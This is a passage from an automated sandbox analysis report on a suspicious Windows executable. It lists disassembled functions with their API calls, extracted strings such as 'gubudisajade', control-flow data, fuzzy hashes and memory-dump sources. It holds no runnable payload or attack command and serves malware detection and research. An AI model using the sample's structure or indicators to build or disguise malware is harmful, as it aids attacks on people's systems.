                                                                                          • Associated: 00000000.00000002.1508596131.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509533993.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509549523.000000000042B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509563679.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509841472.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_e6reA52T4I.jbxd
                                                                                          Similarity
                                                                                          • API ID: ConsoleFileInput$AtomCommandFindFirstGlobalLineMoveNameProgressReadWithWrite
                                                                                          • String ID: $gubudisajade
                                                                                          • API String ID: 2825188472-2435646076
                                                                                          • Opcode ID: d262bbbbb054dd9e0af2fd261a9670b976b0c1255ac637e0c76f3e22f10ff492
                                                                                          • Instruction ID: 03578a7b4f6c6d35950d53c300aa54986e2bb45db194f3eb22b294b21d6d9169
                                                                                          • Opcode Fuzzy Hash: d262bbbbb054dd9e0af2fd261a9670b976b0c1255ac637e0c76f3e22f10ff492
                                                                                          • Instruction Fuzzy Hash: 9351D770608351DFD354CF18E984A1BB7F0FB88714F804A2EF599A7260D778AA45CF9A
                                                                                          Function 00425400 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 113fileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • WriteConsoleInputW.KERNEL32(00000000,00000000,00000000,?), ref: 004254F0
                                                                                          • GlobalGetAtomNameA.KERNEL32(00000000,?,00000000), ref: 0042552C
                                                                                          • GetCommandLineW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0042556C
                                                                                          • MoveFileWithProgressA.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00425594
                                                                                          • FindFirstFileW.KERNEL32(gubudisajade,?), ref: 004255A4
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1508609549.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1508596131.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509533993.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509549523.000000000042B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509563679.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509841472.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_e6reA52T4I.jbxd
                                                                                          Similarity
                                                                                          • API ID: File$AtomCommandConsoleFindFirstGlobalInputLineMoveNameProgressWithWrite
                                                                                          • String ID: $gubudisajade
                                                                                          • API String ID: 839357063-2435646076
                                                                                          • Opcode ID: c453552233aa2484b5919979abdf2a0c1f6ca6e3f273f9b289f303833cd9c91f
                                                                                          • Instruction ID: 161e6f0f1501fcadebe82a2c91f299c8d2c34500cdbccb8e8cbc861c62940b96
                                                                                          • Opcode Fuzzy Hash: c453552233aa2484b5919979abdf2a0c1f6ca6e3f273f9b289f303833cd9c91f
                                                                                          • Instruction Fuzzy Hash: 4B51B6B1608341DFC354CF19D98495BB7E4FB88308F408A2EF59993261D734EA49CF5A
                                                                                          Function 00425659 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 97fileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • WriteConsoleInputW.KERNEL32(00000000,00000000,00000000,?), ref: 004256F3
                                                                                          • GlobalGetAtomNameA.KERNEL32(00000000,?,00000000), ref: 00425731
                                                                                          • GetCommandLineW.KERNEL32 ref: 00425775
                                                                                          • MoveFileWithProgressA.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0042579F
                                                                                          • FindFirstFileW.KERNEL32(gubudisajade,?), ref: 004257AF
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1508609549.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1508596131.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509533993.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509549523.000000000042B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509563679.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509841472.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_e6reA52T4I.jbxd
                                                                                          Similarity
                                                                                          • API ID: File$AtomCommandConsoleFindFirstGlobalInputLineMoveNameProgressWithWrite
                                                                                          • String ID: gubudisajade
                                                                                          • API String ID: 839357063-2246108271
                                                                                          • Opcode ID: 7ffa989f119b1e5fd8bfcc0ce1236e49d3814146bb9aeffc03349017508c177b
                                                                                          • Instruction ID: 19e1274e2d8d635e776f0328ba3a0f9e9330088c357998f5873fd5beffdb6384
                                                                                          • Opcode Fuzzy Hash: 7ffa989f119b1e5fd8bfcc0ce1236e49d3814146bb9aeffc03349017508c177b
                                                                                          • Instruction Fuzzy Hash: D741D3706483418FD750CF28D985A1BBBE0FB88714F414A2EF599A7260D778AA48CB5A
                                                                                          Function 0042545B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 92fileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • WriteConsoleInputW.KERNEL32(00000000,00000000,00000000,?), ref: 004254F0
                                                                                          • GlobalGetAtomNameA.KERNEL32(00000000,?,00000000), ref: 0042552C
                                                                                          • GetCommandLineW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0042556C
                                                                                          • MoveFileWithProgressA.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00425594
                                                                                          • FindFirstFileW.KERNEL32(gubudisajade,?), ref: 004255A4
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1508609549.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1508596131.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509533993.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509549523.000000000042B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509563679.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509841472.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_e6reA52T4I.jbxd
                                                                                          Similarity
                                                                                          • API ID: File$AtomCommandConsoleFindFirstGlobalInputLineMoveNameProgressWithWrite
                                                                                          • String ID: gubudisajade
                                                                                          • API String ID: 839357063-2246108271
                                                                                          • Opcode ID: df8402451949e719ff5b4ab36404d298190f9ca66ed3921dc817d00862366706
                                                                                          • Instruction ID: 60cec3928c3c0daffd928a4105088abef14f0549786659fc7b8b75071443e789
                                                                                          • Opcode Fuzzy Hash: df8402451949e719ff5b4ab36404d298190f9ca66ed3921dc817d00862366706
                                                                                          • Instruction Fuzzy Hash: 3D41BAB16083419FD344CF28D984A5BF7F4FB88319F404A2EF59993250D738DA49CB5A
                                                                                          Function 0040E8D8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54COMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetLocaleInfoW.KERNEL32(?,2000000B,00000000,00000002,?,?,0040EF15,?,00408AAE,?,000000BC,?,00000001,00000000,00000000), ref: 0040E917
                                                                                          • GetLocaleInfoW.KERNEL32(?,20001004,00000000,00000002,?,?,0040EF15,?,00408AAE,?,000000BC,?,00000001,00000000,00000000), ref: 0040E940
                                                                                          • GetACP.KERNEL32(?,?,0040EF15,?,00408AAE,?,000000BC,?,00000001,00000000), ref: 0040E954
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1508609549.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1508596131.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509533993.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509549523.000000000042B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509563679.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509841472.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_e6reA52T4I.jbxd
                                                                                          Similarity
                                                                                          • API ID: InfoLocale
                                                                                          • String ID: ACP$OCP
                                                                                          • API String ID: 2299586839-711371036
                                                                                          • Opcode ID: 456dcd3922c0a97d23352467b51ca7b926e42d9be642dcd6f0f0e1207d8f67fe
                                                                                          • Instruction ID: 86282431c8fb740d179551cbcb83d1411fb15bd447682a9c8fc9a38e0f5a9903
                                                                                          • Opcode Fuzzy Hash: 456dcd3922c0a97d23352467b51ca7b926e42d9be642dcd6f0f0e1207d8f67fe
                                                                                          • Instruction Fuzzy Hash: DF0124B160520ABAEB219B62EC06F5B37A8DB04358F20483BF101F11E1EB78DE51869C
                                                                                          Function 0040C0AA Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SetUnhandledExceptionFilter.KERNEL32(Function_0000C068), ref: 0040C0AF
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1508609549.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1508596131.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509533993.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509549523.000000000042B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509563679.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509841472.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_e6reA52T4I.jbxd
                                                                                          Similarity
                                                                                          • API ID: ExceptionFilterUnhandled
                                                                                          • String ID:
                                                                                          • API String ID: 3192549508-0
                                                                                          • Opcode ID: 0b35d9765afdeda9bb72f4495ce6e86b6756aed2ceaa5d991d111d5dbf88c4af
                                                                                          • Instruction ID: d12c333fd2455dab7cfafed4b85865e262a8c065820cab7c2a29f1b1251f6b63
                                                                                          • Opcode Fuzzy Hash: 0b35d9765afdeda9bb72f4495ce6e86b6756aed2ceaa5d991d111d5dbf88c4af
                                                                                          • Instruction Fuzzy Hash: C1900270651101D6C6041BB45E4974525A05B9CB02B5186716501F84E4DE744008D61A
                                                                                          Function 0040FFE1 Relevance: .4, Instructions: 355COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1508609549.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1508596131.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509533993.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509549523.000000000042B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509563679.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509841472.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_e6reA52T4I.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                                                                                          • Instruction ID: 45d640408adc51e9630250cd852087531390dd73839065ad220bbdb5f354db3c
                                                                                          • Opcode Fuzzy Hash: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                                                                                          • Instruction Fuzzy Hash: B7C19173D0E5B2068B35422D041827FEE626E91B4431FC3F6DCD03F689C66AAE8696D4
                                                                                          Function 0040FBF9 Relevance: .3, Instructions: 349COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1508609549.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1508596131.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509533993.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509549523.000000000042B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509563679.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509841472.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_e6reA52T4I.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                                                                                          • Instruction ID: 30d8583d5410231f990eb28eb556ba3ebd30205fa5dc327a2a401abf38f30bfe
                                                                                          • Opcode Fuzzy Hash: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                                                                                          • Instruction Fuzzy Hash: 68C14F73D0A5B205C775862D445823FEE626E91B4531FC3B6DCD03FAC9C23A6E0A96D4
                                                                                          Function 0040F827 Relevance: .3, Instructions: 332COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1508609549.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1508596131.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509533993.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509549523.000000000042B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509563679.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509841472.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_e6reA52T4I.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                                                                                          • Instruction ID: 16b00f723790cb557a0332ef0a33c36a400bf47c72533d95644a7e654be06258
                                                                                          • Opcode Fuzzy Hash: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                                                                                          • Instruction Fuzzy Hash: 99C18373D1A5B205CB76852D441823FEE626E91B4531FC3B6DCD03FAC9C23A6E0A96D4
                                                                                          Function 0040F489 Relevance: .3, Instructions: 326COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1508609549.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1508596131.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509533993.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509549523.000000000042B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509563679.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509841472.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_e6reA52T4I.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 21b74c51e355f1ada917146b454bba93dbff062365e48e41ecc74cc68dac6f4d
                                                                                          • Instruction ID: e605e52e79a7629159be3138e0ece2ed07f43c6df0fbed25c8c7f3fb72a71265
                                                                                          • Opcode Fuzzy Hash: 21b74c51e355f1ada917146b454bba93dbff062365e48e41ecc74cc68dac6f4d
                                                                                          • Instruction Fuzzy Hash: D8B17273D0A5B205CB75852D445823FEE626E91B4431FC3B6DCD03FAC9C63AAE0A96D4
                                                                                          Function 00930042 Relevance: .1, Instructions: 61COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1510573281.0000000000930000.00000040.00001000.00020000.00000000.sdmp, Offset: 00930000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_930000_e6reA52T4I.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                          • Instruction ID: c1f8849e9c60afa41a7e76db1b4904fb5c5491e265f664ee0a2f2d98c25e15d6
                                                                                          • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                          • Instruction Fuzzy Hash: CE1130723401009FD758DE65DCE1FA673EAEB89360B298155E908CB316D679EC41CB60
                                                                                          Function 00AC2B5D Relevance: .1, Instructions: 61COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1511973932.0000000000ABD000.00000040.00000020.00020000.00000000.sdmp, Offset: 00ABD000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_abd000_e6reA52T4I.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                          • Instruction ID: 91347f9c985dcbebfd0a4eeb01c32515266c115d5298d6eb2f6d7b06a0edc362
                                                                                          • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                          • Instruction Fuzzy Hash: 48113972340100AFDB54DF55DCC1FA673EAEB99760B2A8069E908CB316E676EC42C760
                                                                                          Function 0040A913 Relevance: 42.1, APIs: 18, Strings: 6, Instructions: 109libraryloadermemoryCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 142 40a913-40a925 GetModuleHandleW 143 40a930-40a978 GetProcAddress * 4 142->143 144 40a927-40a92f call 40a660 142->144 146 40a990-40a9af 143->146 147 40a97a-40a981 143->147 150 40a9b4-40a9c2 TlsAlloc 146->150 147->146 149 40a983-40a98a 147->149 149->146 153 40a98c-40a98e 149->153 151 40a9c8-40a9d3 TlsSetValue 150->151 152 40aa89 150->152 151->152 154 40a9d9-40aa1f call 40764d EncodePointer * 4 call 40b764 151->154 155 40aa8b-40aa8d 152->155 153->146 153->150 160 40aa21-40aa3e DecodePointer 154->160 161 40aa84 call 40a660 154->161 160->161 164 40aa40-40aa52 call 4099fc 160->164 161->152 164->161 167 40aa54-40aa67 DecodePointer 164->167 167->161 169 40aa69-40aa82 call 40a69d GetCurrentThreadId 167->169 169->155
                                                                                          APIs
                                                                                          • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,00407BB7), ref: 0040A91B
                                                                                          • __mtterm.LIBCMT ref: 0040A927
                                                                                            • Part of subcall function 0040A660: DecodePointer.KERNEL32(00000005,0040AA89,?,00407BB7), ref: 0040A671
                                                                                            • Part of subcall function 0040A660: TlsFree.KERNEL32(00000002,0040AA89,?,00407BB7), ref: 0040A68B
                                                                                            • Part of subcall function 0040A660: DeleteCriticalSection.KERNEL32(00000000,00000000,77665810,?,0040AA89,?,00407BB7), ref: 0040B7CB
                                                                                            • Part of subcall function 0040A660: _free.LIBCMT ref: 0040B7CE
                                                                                            • Part of subcall function 0040A660: DeleteCriticalSection.KERNEL32(00000002,77665810,?,0040AA89,?,00407BB7), ref: 0040B7F5
                                                                                          • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 0040A93D
                                                                                          • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 0040A94A
                                                                                          • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 0040A957
                                                                                          • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 0040A964
                                                                                          • TlsAlloc.KERNEL32(?,00407BB7), ref: 0040A9B4
                                                                                          • TlsSetValue.KERNEL32(00000000,?,00407BB7), ref: 0040A9CF
                                                                                          • __init_pointers.LIBCMT ref: 0040A9D9
                                                                                          • EncodePointer.KERNEL32(?,00407BB7), ref: 0040A9EA
                                                                                          • EncodePointer.KERNEL32(?,00407BB7), ref: 0040A9F7
                                                                                          • EncodePointer.KERNEL32(?,00407BB7), ref: 0040AA04
                                                                                          • EncodePointer.KERNEL32(?,00407BB7), ref: 0040AA11
                                                                                          • DecodePointer.KERNEL32(0040A7E4,?,00407BB7), ref: 0040AA32
                                                                                          • __calloc_crt.LIBCMT ref: 0040AA47
                                                                                          • DecodePointer.KERNEL32(00000000,?,00407BB7), ref: 0040AA61
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0040AA73
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1508609549.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1508596131.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509533993.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509549523.000000000042B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509563679.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509841472.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_e6reA52T4I.jbxd
                                                                                          Similarity
                                                                                          • API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                                                                                          • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL$PNfw
                                                                                          • API String ID: 3698121176-1510553553
                                                                                          • Opcode ID: 8c9ca64a3d4f0f65c3a10dcc3d454d908beb19adb86461bb2d25de777e14fe7b
                                                                                          • Instruction ID: 5367a3aa28f6f5c5c198a4a719926eda5d08db90adbc4f29f7b004c2656550f2
                                                                                          • Opcode Fuzzy Hash: 8c9ca64a3d4f0f65c3a10dcc3d454d908beb19adb86461bb2d25de777e14fe7b
                                                                                          • Instruction Fuzzy Hash: E53195B0B023519BD771AF76AE096163FA0AB49760754093BE410B72F0D77C8492CF5E
                                                                                          Function 00405010 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 56COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • __CxxThrowException@8.LIBCMT ref: 0040505B
                                                                                            • Part of subcall function 004080C1: RaiseException.KERNEL32(00000004,?,?,>@), ref: 00408103
                                                                                          • std::exception::exception.LIBCMT ref: 0040503C
                                                                                            • Part of subcall function 00407340: std::exception::_Copy_str.LIBCMT ref: 0040735B
                                                                                          • std::exception::exception.LIBCMT ref: 0040507C
                                                                                          • __CxxThrowException@8.LIBCMT ref: 0040509B
                                                                                          • std::exception::exception.LIBCMT ref: 004050B8
                                                                                          • __CxxThrowException@8.LIBCMT ref: 004050D7
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1508609549.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1508596131.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509533993.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509549523.000000000042B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509563679.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509841472.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_e6reA52T4I.jbxd
                                                                                          Similarity
                                                                                          • API ID: Exception@8Throwstd::exception::exception$Copy_strExceptionRaisestd::exception::_
                                                                                          • String ID: PK@$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                          • API String ID: 1430062303-1665715117
                                                                                          • Opcode ID: f2629828ccd82f9dedb0259bdfbfcbfa0419decc2ad87fecf373c6f7c7a59303
                                                                                          • Instruction ID: 03cbc603835c7803001d72c86729f54839894d91291aadcc3d6db1ecc7fffed5
                                                                                          • Opcode Fuzzy Hash: f2629828ccd82f9dedb0259bdfbfcbfa0419decc2ad87fecf373c6f7c7a59303
                                                                                          • Instruction Fuzzy Hash: 6911A5B14083018FD308EF56C54594FBBE8AED4748F144A2FB58577182DBB8E648CBAB
                                                                                          Function 004252A0 Relevance: 13.6, APIs: 9, Instructions: 58fileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SetCommState.KERNEL32(00000000,00000000,004259CB,?,?,?,004272CB,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258,78004678,12D1A763,1ED99A87), ref: 004252BB
                                                                                          • RemoveDirectoryW.KERNEL32(00000000,?,?,?,004272CB,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258,78004678,12D1A763,1ED99A87,38EE1569,5EBC0077), ref: 004252C3
                                                                                          • SetSystemPowerState.KERNEL32(00000000,00000000), ref: 004252CD
                                                                                          • GetWindowsDirectoryW.KERNEL32(31DC30DB,00000000,?,?,?,004272CB,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258,78004678,12D1A763,1ED99A87,38EE1569), ref: 004252DA
                                                                                          • WriteConsoleInputW.KERNEL32(00000000,00000000,00000000,6766C36F,?,?,?,004272CB,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258,78004678,12D1A763), ref: 004252EB
                                                                                          • GetCompressedFileSizeW.KERNEL32(00000000,00000000,?,?,?,004272CB,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258,78004678,12D1A763,1ED99A87,38EE1569), ref: 004252F8
                                                                                          • CreateFileW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,004272CB,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729), ref: 0042530C
                                                                                          • FoldStringW.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,004272CB,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258,78004678), ref: 00425322
                                                                                          • ReplaceFileA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00425334
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1508609549.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1508596131.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509533993.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509549523.000000000042B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509563679.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1509841472.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
